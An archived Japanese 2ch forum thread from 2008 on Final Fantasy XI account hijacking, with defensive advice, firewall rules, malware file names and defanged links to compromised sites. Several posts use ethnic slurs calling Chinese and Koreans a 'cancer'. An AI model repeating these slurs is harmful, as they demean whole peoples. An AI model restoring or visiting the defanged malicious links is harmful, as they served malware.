■戻る■ 全部 1- 101- 201- 301- 401- 501- 601- 701- 801- 901- 1001- 最新50  

●● RMT業者の垢ハックが多発している件39 ●●

1 名前:テンプレ:2008/09/07(日) 05:04:36 ID:P9apNmu6
■被害報告をされる方は被害報告用テンプレに沿って書き込みをお願いします
★このスレで紹介されるURL(外部リンク)を踏むのは、すべて自己責任でお願いします
  ・Windows及びFlashPlayerなどのソフトが最新の状態であることを確認してください
  ・使用ブラウザのスクリプト実行を不許可にすることをお勧めします
★前スレ ●● RMT業者の垢ハックが多発している件38 ●● http://changi.2ch.net/test/read.cgi/ogame/1219950507/

■リアルタイムで被害に遭われている方へ(↓でスクエニに被害報告を)
   不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
   受付:月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)

■テンプレ = ttp://www.geocities.jp/ff11warning/template/ (ttp://miku.xrea.jp/template/のミラーサイト)
  「一般テンプレ」に関してはこちらのサイトをご覧ください
■まとめサイト
FF11Warning(垢ハックについての対策とか詳しく載ってます)= ttp://miku.xrea.jp/
     (xreaが不安な人はミラーサイトへ = ttp://www.geocities.jp/ff11warning/)
FFIX Virus問題 まとめサイト(初心者さん向け)= ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
【FF11】アカウント不正ログイン被害まとめ(スレNo.20以前の過去ログあり)= ttp://ort.sakura.ne.jp/taisai/
★そのサイトが安全かどうかの鑑定が欲しいかたは↓に行ってください(このスレでの鑑定依頼はNGです)
  勇気がなくて踏めない人のための鑑定スレPart18 http://pc11.2ch.net/test/read.cgi/hack/1208760889/
  ※専ブラで画像を先に読み込む仕様になっている場合は設定を変えてください(jpg偽装のウイルスとかも鑑定されているようです)

2 名前:テンプレ:2008/09/07(日) 05:06:06 ID:P9apNmu6
----------アカハック被害報告用テンプレ(書ききれない場合は複数レスに分けて下さい)----------
●気付いた日時(アカハック被害に気付いた日時)
●不審なアドレスのクリックの有無(blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス、ドメインのドット(.)を○等で置き換える事。h抜き等は駄目)
●他人が貴方のIDを使用したことが一度でもあるか(Yes/No)
●ID・Passの認証方法(POLに保存/自動ログイン/手打ち、途中で変更した場合はその履歴、例:自動ログイン→○月○日から手打ち、等)
●Pass変更の履歴(した/していない・していたならパスの最終更新日、等)
●他人が貴方のPCを使う可能性の有無(Yes/No)
●ツールの使用の有無:Yes/No・Yesの場合はそのToolの説明
●ネットカフェの利用の有無:Yes/No
●使っているOS(SP等まで書く)
●使用ブラウザ(バージョン等まで分かれば書く)
●WindowsUpdateの有無(最終更新日、等)
●FlashPlayerとRealPlayerのバージョン(更新日時をわかる範囲で・未導入であれば無し)
●アンチウイルスソフト(たとえば NortonInternetSecurity2008 等の名称、及びパターン更新日)
●その他のSecurty対策(Spybot S&D、ルータ、等)
●ウイルススキャン結果(たとえば カスペルスキーオンラインスキャンでC:\WINDOWS\System32\○○.DLLをTrojan.W32○○として発見 等)
●スレログやテンプレを読んだか(Yes/No/今から読みます)
●hosts変更(有/無・有りの場合は最終更新は何時ごろか)
●PeerGuardian2の導入(有/無・有りの場合は参照元サイトはどこか)
●その他情報・症状など(書ききれない場合は次レスで書いてください)

3 名前:テンプレ:2008/09/07(日) 05:06:52 ID:P9apNmu6
■各種ソフトのアップデート報告(情報提供等)について
スレ内を検索しやすいように各種ソフトのupdate情報には符丁をつけておくことを推奨します。

★FlashPlayerなどAdobe系ソフト、Firefoxなどブラウザ、NoScriptなどアドオンなどの更新があったときには
 ※※各種ソフトウェアアップデート情報※※

★セキュリティホールに関するニュースが出たときには
 ※※セキュリティホール情報※※

を付けてみてください。


以上、ここまでテンプレ

■そのほかの一般テンプレに関しては「>>1」にあるテンプレサイトの「具体的な自衛策」をご覧ください

4 名前:テンプレ番外:2008/09/07(日) 05:09:36 ID:P9apNmu6
前スレで要望がありましたので出しておきます

■POL用ファイアーウォールの設定(アプリケーションルールでpol.exeの設定)
※これはpol.exeのプロセスの一部に同化してアカウント情報を送信するマルウェアにしか効果がありません。
 現在、上記に該当する既知のものはwzcsvbxm.dll系・Kernaeghdrv.dll系です。
※下記設定(記述の仕方)はお使いのソフトによって異なりますので、それぞれのソフトのFQAをご自身でご確認ください。
許可しているリモートIPの範囲
61.195.48.0-61.195.55.255 (61.195.48.0/21)
61.195.56.0-61.195.59.255 (61.195.56.0/22)
61.195.60.0-61.195.63.255 (61.195.60.0/22)
202.67.48.0-202.67.63.255 (202.67.48.0/20)
219.117.144.0-219.117.159.255 (219.117.144.0/20)
※「61」で始まるIPは「61.195.48.0-61.195.63.255(61.195.48.0/20)」でくくってしまっても○
※FWによっては()内のIPアドレス範囲の設定の仕方を指定できるようなので、その場合()内の数値を使用すると
 設定が簡単になります。

空けているローカルポート TCP1024-65535 UDP50000-65535
空けているリモートポート TCP25,80,110,443 ,50000-65535 UDP50000-65535
※契約プロバイダによってはローカルポート UDP53番が必要になるようです(プロバイダに確認してください)

5 名前:既にその名前は使われています:2008/09/07(日) 05:35:46 ID:P9apNmu6
前スレの>>964に出ていた件
必要性はあまり感じませんが、必要だと思われる方は反応してくださいm(_ _)m

964 :既にその名前は使われています:2008/09/07(日) 00:44:58 ID:2eVn6Peg
【トロイ広告】xrea.com part135【放置プレイ】
http://pc11.2ch.net/test/read.cgi/hosting/1219797151/301

> 301 名前:名無しさん@お腹いっぱい。:2008/09/06(土) 23:44:25 0
> >>299
> それさ、flashなどの惰弱製を狙ったウィルスはFF11のクライアントソフトの内容を書き換えるものだった
> だけどFF Warningとかいうサイトでは大元のウィルスに対する対策しか報じていない
> ウィルスによって書き換えられたクラインアントソフトに対して何の対策も講じていないんだよ
> それなのにこの話題を扱ったスレでは「カスペルスキーでオンラインスキャンしろ」
> とかいう対策がまかり通っている。それで安全だと思っている
> その程度の危機意識の管理人がサイト運営をしている
>
> カスペルスキーが対策したのは大元のウィルスで、そのウィルスによって仕込まれた可能性のあるスパイウェアじゃない


pol.exeが書き換えられるのか?詳しい人解説を頼む。

6 名前:5:2008/09/07(日) 05:49:43 ID:P9apNmu6
とりあえずPOL.exe改竄については、かなり前のスレで話題になっていましたので
そのときのログ↓

>353 :既にその名前は使われています:2008/07/11(金) 17:41:16 ID:ZiN5jL/U
>MD5 (pol.exe) = dc11348f317f613aa55c3e8b4b749c09
>恐らく感染していないだろうpolのMD5値です。ファイルサイズは>347と一緒
 ↓
>398 :既にその名前は使われています:2008/07/11(金) 18:48:52 ID:4z35c7ut
>多分感染してるPCのpolです(シャットダウンと終了オプション アプリケーションの追加と削除が異様に遅い)
>MD5 (pol.exe) = dc11348f317f613aa55c3e8b4b749c09
>1,691,648 バイト
>pol改ざんじゃないのかな

7 名前:既にその名前は使われています:2008/09/07(日) 06:22:05 ID:d+7RvZWq
続きくらいかけと・・・>>ID:P9apNmu6


POL.exeが改竄される件についてはこのスレで結論出てますね

398の「多分」の部分を完全に打ち消したいので、できれば感染経験者さんに
もう一度POL.exeをVirus Totalにでも投げてもらって、そのMD5値を確認したい
ところです

8 名前:既にその名前は使われています:2008/09/07(日) 07:32:02 ID:a1yOjulH
特定のソフトを貶めたいわけじゃないんですが、嘘情報が広まるのもよくないので
前スレのノートンファイアウォールについての続き

>>953
> ノートン360はウンコという評価が定番

>>954
>急にノートン叩き湧き出して笑った。
>NIS入ってると1039045744:88みたいな普通使わないポート88使うようなのは警告出てバレるのに気がついたのかね。

>>956
>本当に警告でる?

>>958
>「全てを許可」なんてアホな設定にしてなければ出ます。

>>959
>360で検証
>デフォルト設定 → 普通に接続できます。
>99をブロックするように設定 → 当然ブロック。ただしログはでない。

9 名前:既にその名前は使われています:2008/09/07(日) 07:42:50 ID:a1yOjulH
前スレは360の検証だったのでNIS2008でも確認

・デフォルト設定 → 普通に接続できます
・99をブロックするように設定 → 当然ブロック。

これはいいとして、NISは360と違い、「ログを出す」オプションがあるんですが、
★ログは実際には出ません★

以下のログのいずれにも記録されません。
「ネットワーク接続」「ファイアウォールの活動」「侵入防止」「サービスの活動」
「ファイアウォールの警告」「セキュリティリスク」「保護活動」「エラーメッセージ」

ファイアウォールの「プログラム制御」による設定でも「信頼制御>一般ルール」の
いずれでもブロックはするもののログは出力されません。
こんな超弩級の基本的なバグが放置されてるって一体・・・・

また、ログではなく「警告を画面に出す」機能は最初からありません。
うーむ・・・。初心者に警告出しても「これなに?」ってサポートに問い合わせがくるからやめておこうってことなのか・・・?

それともなんか俺勘違いしてる? 「こうやれば出るよ!」とか「俺の環境だと警告出る」とかあれば言ってください。

10 名前:既にその名前は使われています:2008/09/07(日) 08:06:30 ID:i9/Ql2Jh
ヤフオクで「ID乗っ取り」3000件、知らぬ間に大量出品
今年7〜8月に集中、中国・韓国などのアジアから不審な接続
ttp://headlines.yahoo.co.jp/hl?a=20080905-00000063-yom-soci

シナチョンの連中こんなこともやってるぞ



11 名前:既にその名前は使われています:2008/09/07(日) 09:45:49 ID:j9D/cbNj
新スレ乙です

12 名前:既にその名前は使われています:2008/09/07(日) 09:50:35 ID:EZyKY4Mh
マジで特亜人って人類の癌細胞だわw


13 名前:既にその名前は使われています:2008/09/07(日) 10:52:06 ID:u0P65rU4
ところでこいつを見てくれ、ニコ動のページだ。
罠リンクのとこだけ■入れたから確認するときは直してね。
ttp://209.85.175.104/search?q=cache:WUARlqgZXbUJ:www.nicovideo.jp/watch/sm4271888+excite-blog■com&hl=ja&ct=clnk&cd=28&client=opera

このように罠リンクが書き込まれている、つまりは内部に入り込んだということかね。
当然今は罠リンク部分は除去済みだけど。

気をつけてくれよな!


14 名前:既にその名前は使われています:2008/09/07(日) 12:45:38 ID:/U63M+mv
age

15 名前:既にその名前は使われています:2008/09/07(日) 12:57:13 ID:XgMe+0pj
>>5
なんかこのレスの人微妙にズレてるっつーか、スレで話してる内容ちゃんと理解してないっぽいんだよね

>それなのにこの話題を扱ったスレでは「カスペルスキーでオンラインスキャンしろ」 とかいう対策がまかり通っている。それで安全だと思っている
カスペオンラインが薦められるのはその手のトロイに対する定義ファイルの対応が「比較的」早いので
検出の可能性が「若干」高いから。怪しいと思ったらまず原因を見つけとけって話でしょ。
見つけた後の事後「対策」はまた別の話だと思う。

>カスペルスキーが対策したのは大元のウィルスで、そのウィルスによって仕込まれた可能性のあるスパイウェアじゃない
っていう認識は現状と真逆でしょ。悪さをするトロイ自体は特定できたけど、
そいつを生成する(仕込む)大元のドロッパなんかを見つけられてないからクリンインスコでまっさらにしろって薦められてるんだし。

一昔前のwzcsvbxm.dllの挙動「pol.exeの起動と同時に干渉し送信データを盗む」「潜伏するためにWindowsupdateに係るレジストリを書き換える」
そのへんをごっちゃにして「クライアントソフト自身が書き換えられる」とか言ってんじゃないの

つーか「惰弱性」とか言ってる時点でよくわかってない子の気がするよ

16 名前:既にその名前は使われています:2008/09/07(日) 13:51:06 ID:1aN0tAVY
バスター未検知でカスペでTrojan-Downloader.JS.Agent.clnが出た。
これ垢ハックと関係あるよな・・・
めんどくせー

17 名前:既にその名前は使われています:2008/09/07(日) 13:59:27 ID:96XaC83y
面倒なら是非そのままで

18 名前:既にその名前は使われています:2008/09/07(日) 14:43:30 ID:zDuml//+
age

19 名前:既にその名前は使われています:2008/09/07(日) 14:52:50 ID:fzWKA96R
前スレ
>>986>>990
サービス終了にしたいんじゃなくてw
最大の対策はサービス終了くらいしかないって意味で

20 名前:既にその名前は使われています:2008/09/07(日) 14:54:09 ID:kAqzFDMF
wikipediaまた韓国に戻ったみたいだね

21 名前:既にその名前は使われています:2008/09/07(日) 16:46:59 ID:zcjAbgev
249からあげあげ

22 名前:既にその名前は使われています:2008/09/07(日) 17:12:33 ID:GZkd69Gd
ほしゅ

23 名前:既にその名前は使われています:2008/09/07(日) 17:42:51 ID:et3/39ah
とうとうニコニコもやられたのか。シナチク糞だな…。

24 名前:既にその名前は使われています:2008/09/07(日) 17:50:47 ID:3si1g2uS
>>13
それってBlogとかにあるニコ動リンク?
それともニコ動内を見てるだけでアウトなの?

25 名前:既にその名前は使われています:2008/09/07(日) 18:00:38 ID:fK3v7qah
>>19
中華の中継プロキシつぶせばいいじゃん
どんどん

26 名前:既にその名前は使われています:2008/09/07(日) 18:11:55 ID:u0P65rU4
>>24
www.nicovideo.jp/watch/sm4271888

13はこれのキャッシュだよ(今は害がある文面ではない)。
当時でも直接リンクになっていないからコピペしてアクセスを試みなければよいのだけど、
うっかり引っかかったやつがいたんだろうね。
投稿した動画などから狙いはコピペしてアクセスしてくれることを期待しつつ、
虱潰し的に感染させて根こそぎふんだくろうという作戦だろう。

しかし程なくしてゴルァが入って罠リンク部分が運営によって”test”になったんじゃね?

ニコにはもう中華が入り込んだと見ていい、アカウントも残ったままだ、
ライブドアの対応並に厄介かもしれない。

動画の説明にリンクが書かれていたらコピペアクセス前に検索をかける癖をつけないと
引っかかるやつ多発しそう。

気をつけてくれよな!

27 名前:既にその名前は使われています:2008/09/07(日) 18:14:43 ID:kJLh6wMV
ニコで色んなMMOの広告がある→中華介入→中華^q^ドワンゴ^q^

28 名前:既にその名前は使われています:2008/09/07(日) 18:19:17 ID:fzWKA96R
こんな所で悩んでないでPS2買ったら?
出来ればPS-Xがいいと思います!

29 名前:既にその名前は使われています:2008/09/07(日) 18:28:16 ID:4uLGfdbL
www.nicovideo.jp/watch/sm4271888のうぷ主は業者ではないね。
マイリス公開してるし 同じハンドルでサイトもやってて結構いろんなとこで着メロの配信もしてる。
ニコニコのパス抜きに引っかかったと見るべきかと思います。
参考までにsm4271888は現時点で 再生数11


30 名前:既にその名前は使われています:2008/09/07(日) 19:16:12 ID:+Uu8iire
>>16
俺もバスターwさん使い
カスペで月1の割合でオンラインスキャンしてるんだが、一度もウィルスかからず。
こういうのは「重要な領域」以外から見つかるものなのか?

ageage

31 名前:既にその名前は使われています:2008/09/07(日) 19:22:23 ID:/OVVhCGv
【site:xrea.com ff11】13100件
http://www.google.co.jp/search?hl=ja...%A2&lr=lang_ja
【site:xrea.com ffxi 】10700件
http://www.google.co.jp/search?hl=ja...%A2&lr=lang_ja
【site:xrea.com final fantasy xi】1170件
http://www.google.co.jp/search?hl=ja...%A2&lr=lang_ja
【site:xrea.com final fantasy 11】5580件
http://www.google.co.jp/search?hl=ja...%A2&lr=lang_ja

これも張っておきます。
正月休み前にも再び改竄ありそうだけど、
その前の連休とかバージョンアップ時に狙われそうだ。
鯖側でひそかに対応してるかもしれないけど。

32 名前:貼り直し:2008/09/07(日) 19:24:28 ID:/OVVhCGv
>>31
【site:xrea.com ff11】13100件
http://www.google.co.jp/search?hl=ja&client=firefox-a&rls=org.mozilla%3Aja%3Aofficial&hs=oGr&q=site%3Axrea.com+ff11&btnG=%E6%A4%9C%E7%B4%A2&lr=lang_ja
【site:xrea.com ffxi 】10700件
http://www.google.co.jp/search?hl=ja&client=firefox-a&rls=org.mozilla%3Aja%3Aofficial&hs=hIr&q=site%3Axrea.com+ffxi&btnG=%E6%A4%9C%E7%B4%A2&lr=lang_ja
【site:xrea.com final fantasy xi】1170件
http://www.google.co.jp/search?hl=ja&client=firefox-a&rls=org.mozilla%3Aja%3Aofficial&hs=9xB&q=site%3Axrea.com+final+fantasy+xi&btnG=%E6%A4%9C%E7%B4%A2&lr=lang_ja
【site:xrea.com final fantasy 11】5580件
http://www.google.co.jp/search?hl=ja&client=firefox-a&rls=org.mozilla%3Aja%3Aofficial&hs=xdW&q=site%3Axrea.com+final+fantasy+11&btnG=%E6%A4%9C%E7%B4%A2&lr=lang_ja

33 名前:既にその名前は使われています:2008/09/07(日) 19:32:45 ID:Vaq4zvQ5
うちのサイトcoreserver.jp使ってるんだけど
中国圏から大量の検索ログ残ってた

coreserver.jp ff11

34 名前:既にその名前は使われています:2008/09/07(日) 19:41:16 ID:/OVVhCGv
>>33
ttp://bantouhan.com/2007/08/post_275.php
>「XREA.COM」と「CORESERVER.JP」とは、運営会社が同じで、コントロールパネルも同じなので、

やばいかもしれんね。

35 名前:既にその名前は使われています:2008/09/07(日) 20:16:51 ID:HnX6qcM9
xreaサイトIP

50.139.29.96 - 59.139.29.127       59.139.29.224 - 59.139.29.255
60.32.200.64 - 60.32.200.95        60.32.201.90 - 60.32.201.127
125.53.24.64 - 125.53.24.95        125.53.24.128 - 125.53.24.159
125.53.25.0 - 125.53.25.63        125.53.25.224 - 125.53.26.31
202.229.187.24 - 202.229.187.27      210.153.88.112 - 210.153.88.115
210.172.108.224 - 210.172.108.255     210.196.169.192 - 210.196.169.223
210.196.173.48 - 210.196.173.63      210.196.176.176 - 210.196.176.191
210.251.253.224 - 210.251.253.255     218.216.67.32 - 218.216.67.63
219.101.229.128 - 219.101.229.191     219.163.5.176 - 219.163.5.191
219.163.200.64 - 219.163.200.127     221.186.251.64 - 221.186.251.127
222.227.75.0 - 222.227.75.63       222.227.75.96 - 222.227.75.159

補完あればよろしく

36 名前:既にその名前は使われています:2008/09/07(日) 20:35:04 ID:3YI6N1+P
なぜXreaの運営は対策をしないのか
なぜなんだい


37 名前:既にその名前は使われています:2008/09/07(日) 20:39:22 ID:ElmMYC6w
周りが騒いでるのニヤニヤして楽しんでる

38 名前:既にその名前は使われています:2008/09/07(日) 20:42:11 ID:HnX6qcM9
>>36
重要度の問題かもしれませんね
たかがゲームになんの対策だと思ってる運営かもしれません

39 名前:既にその名前は使われています:2008/09/07(日) 21:35:45 ID:Q4cxzYaa
逆に考えるんだ、対策をしないのではなくハニーポットなのだと

40 名前:既にその名前は使われています:2008/09/07(日) 21:38:43 ID:4uLGfdbL
サポートみてても 最近のXREAはVALUE DOMAINのオマケで
やりたくないのにやってるって感じ。

XREAは広告ついてる無料のユーザーでも シェルもcronもDBもcgi使える。
coreで年額5000円 xreaで2400円 
比較できる料金帯だとさくらのスタンダード一択だけど DBが弱いから MTやWPやってる人には厳しい。
よそで同じ機能のレン鯖借りようと思ったら1年最低5万かかると思ってくれ。

つまりXREAはノンサポート前提で 他のレン鯖に比べたら超やっすい。
その代わり基本的なトラブルはユーザで解決してくれってスタンス。
だから イヤナラヤメテモイインジャヨ なんだと思うよ。
それはかまわないんだが 前回の広告のときの対応の遅さにあきれて見切りつけたくても 
機能と費用考えたら手ごろな移転先がない=競合がない状態だから
それで 放置してるかもしれないね。

41 名前:既にその名前は使われています:2008/09/07(日) 21:41:06 ID:3YI6N1+P
まともに鯖管理する気ねぇなら業務たたんじまえカスが!!!


と電話凸していいですか><

42 名前:既にその名前は使われています:2008/09/07(日) 21:41:28 ID:4uLGfdbL
ゲームだから放置ってんじゃなくて もー全体的に放置
負荷の高いサーバがあってもシステム障害が出ても放置
負荷かけてるユーザも放置
放置プレイ

43 名前:既にその名前は使われています:2008/09/07(日) 21:51:16 ID:fzWKA96R
このスレもういらなくね?今俺がageなかったら@10年くらいで落ちてたぞ?

44 名前:既にその名前は使われています:2008/09/07(日) 21:55:07 ID:HnX6qcM9
>>43
いま88くらいでしたよ

45 名前:既にその名前は使われています:2008/09/07(日) 22:30:42 ID:a1yOjulH
前スレでもxreaの話はあったが、xrea,fc2の話は基本レンタル鯖板でやった方がいいと思う。

エンドユーザー側がどういう対策がありうるかはこっちでいいけど。

46 名前:既にその名前は使われています:2008/09/07(日) 22:49:14 ID:HnX6qcM9
>>45
スレ維持のためには、いまは話題を選ばないほうがいいと思います

47 名前:既にその名前は使われています:2008/09/07(日) 23:05:28 ID:fzWKA96R
まぁ無料だでぐだぐだ言うなw
xrea,fc2は飽きた

48 名前:既にその名前は使われています:2008/09/07(日) 23:06:58 ID:t1RrHRi1
>>47
今回は有料のほうもやられとるよ

49 名前:既にその名前は使われています:2008/09/07(日) 23:17:03 ID:RVLrptBS
韓国中国はほんとに腐ってるなw
こんな国と一緒にアジアでくくられるとかありえない

50 名前:既にその名前は使われています:2008/09/07(日) 23:47:54 ID:EpFXlXM2
age

51 名前:既にその名前は使われています:2008/09/08(月) 00:08:29 ID:y5dO6Fj0
ho

52 名前:既にその名前は使われています:2008/09/08(月) 00:28:41 ID:3R2Iap7Y
おやすみ前のあげ。

53 名前:既にその名前は使われています:2008/09/08(月) 01:20:10 ID:ojEUk+eX
よいしょー

54 名前:既にその名前は使われています:2008/09/08(月) 01:21:32 ID:C/TXuFV/
ニコニコ見てたらPG2が反応したわ
なんかキモイ動画だったし納得

55 名前:既にその名前は使われています:2008/09/08(月) 01:32:23 ID:+j7s2vwq
それニコニコ市場の商品画像とかの鯖がたまに大陸にあるからだな

56 名前:既にその名前は使われています:2008/09/08(月) 01:35:51 ID:KHZNPbGR
徐々にネットに安全な場所がなくなっていくのがなんか嫌だなぁ

57 名前:既にその名前は使われています:2008/09/08(月) 01:45:43 ID:52OE/rH3
あげー

58 名前:既にその名前は使われています:2008/09/08(月) 02:46:29 ID:q935o361
204唐揚げ

59 名前:既にその名前は使われています:2008/09/08(月) 02:55:01 ID:af9EwmMY
おやすみage。
おでん規制かorz どれもこれも垢ハックに起因してるな...

>>13 >>24 >>26 を100回読んだけどいまいち理解できなかったorzモウトシカ...
1)ニコに罠が仕込まれた
2)ニコの動画はブラフでブログでのリンク先が罠になってる(コピペでボーン)

どっちなんだろう。

60 名前:既にその名前は使われています:2008/09/08(月) 04:06:33 ID:q935o361
>>59
ニコ動に中華が入り込んでる認識でいいと思いますよ
ニコ動にも罠が仕掛けられてるようです

61 名前:既にその名前は使われています:2008/09/08(月) 04:18:51 ID:0fCz8wRX
これyoutubeとかにやられたら世界的に被害広がるんだろか
てか、外国でも中華の垢ハック問題になってんのかな


62 名前:既にその名前は使われています:2008/09/08(月) 04:22:33 ID:jr8wE7vW
色々調べてFFやりたいのに出来ないし
ネット巡回も危うくなってきたし
いくら対策しても安心は出来ないし

なんと言ってもFF系を調べる事に恐怖を感じるようになった。
情報ないとやりたい事もできやしない

63 名前:既にその名前は使われています:2008/09/08(月) 04:26:20 ID:r8X2arpN
FFはとっくに引退したから関係ないけど
これってブラウザ関係なく抜かれるの?

64 名前:既にその名前は使われています:2008/09/08(月) 04:28:36 ID:q935o361
>>63
スクリプトを確実に不許可にできる環境なら「いまのとろは」大丈夫です
スクリプトが許可になってればウィルスは落ちてくる可能性が高いですね
ここで危険だと言われているサイトはとくに

65 名前:既にその名前は使われています:2008/09/08(月) 06:41:47 ID:D89/wyuv
NHKでヤフーIDハックのニュース流れてる

66 名前:既にその名前は使われています:2008/09/08(月) 06:46:08 ID:D89/wyuv
>>62
すっげーわかるわ
ネットで調べないと何も出来ない何も準備できないのに
危険だからネット巡回できない
安全にスクリプト全部切ってネット巡回すると、サイトの内容が表示されないからやっぱりFFできないw
公式攻略サイトでもつくってくれ■e

67 名前:既にその名前は使われています:2008/09/08(月) 06:59:31 ID:HR7/KtOk
>>62
>>66
つ電撃本

68 名前:既にその名前は使われています:2008/09/08(月) 07:43:31 ID:ehBlxuGO
PS2買えば全て解決では?

69 名前:既にその名前は使われています:2008/09/08(月) 09:58:24 ID:kDOIvn+p
ところで、アメリカとかで垢ハックはやってるの?
スクエニがハックについてpolシステムの変更を検討中をか話は聞かないけど。
米にハックがはやってたらもっと具体的な対策とらないか?

70 名前:既にその名前は使われています:2008/09/08(月) 10:04:29 ID:ojEUk+eX
保守のついでに俺対策。
FF専用機を購入してセキュリティ一通り設定して、1ログインログアウト毎にPS2で入りなおしてパス変えて
PCでFF中も、万が一業者とログイン合戦になった時の為にPS2をログイン画面で待機させている。
それでも不安でーす○| ̄|_

71 名前:既にその名前は使われています:2008/09/08(月) 10:10:16 ID:3gUpYF64
>>69
NAの友人に垢ハックについて聞いてみたところ、「知っている」とは言ってたけど
日本ほどやられてるってわけじゃないみたいだ。
なんでだろなあ?
あっちの人は皆セキュリティ意識が高いとか?
俺の英語能力では聞き出すことができんかったw

72 名前:既にその名前は使われています:2008/09/08(月) 10:18:21 ID:V49Ntf8R
>>71
業者の2/3近くが中国、残りの1/3近くが日本在住の業者だからじゃねーの?

73 名前:既にその名前は使われています:2008/09/08(月) 10:36:45 ID:6ad+/hAj
>>71
嘘つくなw
英語がわからないだけでそれがフィルターになってるだけだろ・・
http://www.bluegartrls.com/forum/forumdisplay.php?f=48

普通に話題になってるからみてこいよw

74 名前:既にその名前は使われています:2008/09/08(月) 10:54:14 ID:3gUpYF64
>>73

_| ̄|○
どこで話題になってるかすらわからねぇ・・・俺の英語能力底辺すぎる

75 名前:既にその名前は使われています:2008/09/08(月) 11:03:09 ID:fAEWBEVY
お前が勝手に安全と思ってるだけで昔っからネットは危険なところでしたよっと

76 名前:既にその名前は使われています:2008/09/08(月) 11:08:41 ID:cgSDN3ix
http://www.bluegartrls.com/forum/showthread.php?t=52801&highlight=Hacking
このスレとかそうじゃね?

77 名前:既にその名前は使われています:2008/09/08(月) 11:56:03 ID:eA1kS4lA
>>75
危険/安全どっち? といえば昔から危険だったんだろうが、ここ1〜2年で桁違い。

例えるなら、
昔のハッカ(いたずらっ子)ー=西サルタのヤグ → 今のハッカー(犯罪者)=AbsoluteVirtue
昔:近づかなければ大丈夫、今:タゲられたら死ぬしかないレベル。

78 名前:既にその名前は使われています:2008/09/08(月) 12:18:06 ID:PFSf1pTI
>>77
昔のハッカーは20世紀の話で「ここ1〜2年」じゃないだろ

79 名前:既にその名前は使われています:2008/09/08(月) 14:01:06 ID:J3J+5JJF
自己顕示欲から金銭目当てに動機がシフトしたからだろ

80 名前:既にその名前は使われています:2008/09/08(月) 14:33:57 ID:eRiSmt7L
270からあげ

81 名前:既にその名前は使われています:2008/09/08(月) 14:43:52 ID:g2FLUzow
>>79
それは>>77と同じで認識が古い
金儲けの手法自体がどんどん進化してることが問題

82 名前:既にその名前は使われています:2008/09/08(月) 14:57:48 ID:gOf3EkFq
MMOのゲームデータがいい金になる、なんて数年前には予想もつかなかった。
たかがゲームとヌルい事言われているうちに全力でハクる。

83 名前:既にその名前は使われています:2008/09/08(月) 15:23:28 ID:eRiSmt7L
まぁでも、書き込みもかなり減ったから落ち着いてきている
状況ではあるのでしょうね
一回やられて注意する人が増えたのか、二回目もやられて
泣く泣く引退した人が増えたのか、どっちだかわからないけど

84 名前:既にその名前は使われています:2008/09/08(月) 16:24:10 ID:H87lIcUa
ハックされて一回目で引退したよ。
悔いはLSの人、フレにちゃんとあいさつ出来なかった事。
マジで特亜は地球の癌。
(´∀`∩)↑age↑

85 名前:既にその名前は使われています:2008/09/08(月) 16:34:59 ID:gOf3EkFq
面倒な警察届け出とかまでの段階にいく人は多くないのかもしれないね。
ちょっと飽きて来たしこのままでいいかってな泣き寝入り含むと
相当数、今も静かに被害で続けているのかも。

86 名前:既にその名前は使われています:2008/09/08(月) 16:37:46 ID:6ad+/hAj
>>85
あの電話のつながらなさを体験すると
もうどうでもいやってなる人がでるのは当然だろw

87 名前:既にその名前は使われています:2008/09/08(月) 16:39:47 ID:zePAMs9G
FFはPS2でやってるから問題ないが、メールの広告クリックしてポイント貯めるサイトでやられた。
全部パス一緒だったし、まあ自分が甘かったわけだが約3万の損失。

88 名前:既にその名前は使われています:2008/09/08(月) 16:50:24 ID:NtAVRFzP

↑↑↑↑↑
↑PON!↑
↑↑↑↑↑ 

89 名前:既にその名前は使われています:2008/09/08(月) 16:56:16 ID:MDUcReok
>>86
不正アクセスはチャット汁だぞ

90 名前:既にその名前は使われています:2008/09/08(月) 16:57:21 ID:waOb9nxe
ヤフオク「ID乗っ取り」報道に反論、情報流出の事実はない
http://internet.watch.impress.co.jp/cda/news/2008/09/08/20788.html

91 名前:既にその名前は使われています:2008/09/08(月) 17:15:40 ID:1ux/xFhq
>>90
少なくともID=パスの馬鹿には返金どころかヤフー側が損害賠償請求していいだろ

92 名前:既にその名前は使われています:2008/09/08(月) 17:19:28 ID:N6rm9Ltp
ヤフオクやってる奴は気の毒だが、
これで中華=垢ハックが少しでも多くの人に知られるようになるのはありがたい

93 名前:既にその名前は使われています:2008/09/08(月) 17:19:44 ID:hGu5pLWB
ID=パスを通すYahooのシステムが・・・

94 名前:既にその名前は使われています:2008/09/08(月) 17:43:45 ID:eRiSmt7L
>ログイン後は、ゲームデータに被害を受けていないかどうか、ご確認ください。
>また、不正アクセスに遭われた旨を、最寄りの警察署へ通報してください。

いちおうスクエニも警察に通報しろって言ってるのね
不正アクセス対策をしっかり読んでて初めて知った

95 名前:既にその名前は使われています:2008/09/08(月) 18:32:23 ID:9pGukVIS
最近PG2のブロック履歴で666■lazh■comが頻繁にあったんで
見に行ったサイトまわってみたら「R.ブレス ソロ ラーニング」でぐぐって
一番目のとこだった。

http://d■hatena■ne■jp/mako0079/
調べ物とかほんと気軽にできなくなったなぁ。

96 名前:既にその名前は使われています:2008/09/08(月) 18:37:19 ID:XkPRbnpR
xreaってeLeMeNも使ってるみたいだけど見ただけでヤバいの?

97 名前:既にその名前は使われています:2008/09/08(月) 18:40:25 ID:7MJP/2Sm
>>96
サイトはplala
解析だけAccessAnalyzer

98 名前:既にその名前は使われています:2008/09/08(月) 19:06:59 ID:XkPRbnpR
サイト自体にxrea使ってなければ大丈夫って事なのか。

99 名前:既にその名前は使われています:2008/09/08(月) 19:15:39 ID:iF0HAmRi
その考え方は危険だよ。

xreaだけが危険って訳じゃないしさ。

100 名前:既にその名前は使われています:2008/09/08(月) 19:38:36 ID:HbdQ5VOP
>95
そこは昔からあるFFブログのアンテナだな。
おそらく引っかかってるのはその先のはず。
今手元に調査する環境が無いから誰か頼む。

101 名前:100:2008/09/08(月) 19:40:12 ID:HbdQ5VOP
>95
すまん、URL勘違いした。
FFアンテナは似てるけど違うところだった。

102 名前:既にその名前は使われています:2008/09/08(月) 19:47:13 ID:7MJP/2Sm
eLeMeNに解析違うのにしたら?って言ったら
うざって返ってきた

103 名前:既にその名前は使われています:2008/09/08(月) 19:58:52 ID:0dP8UDHl
アンチ乙

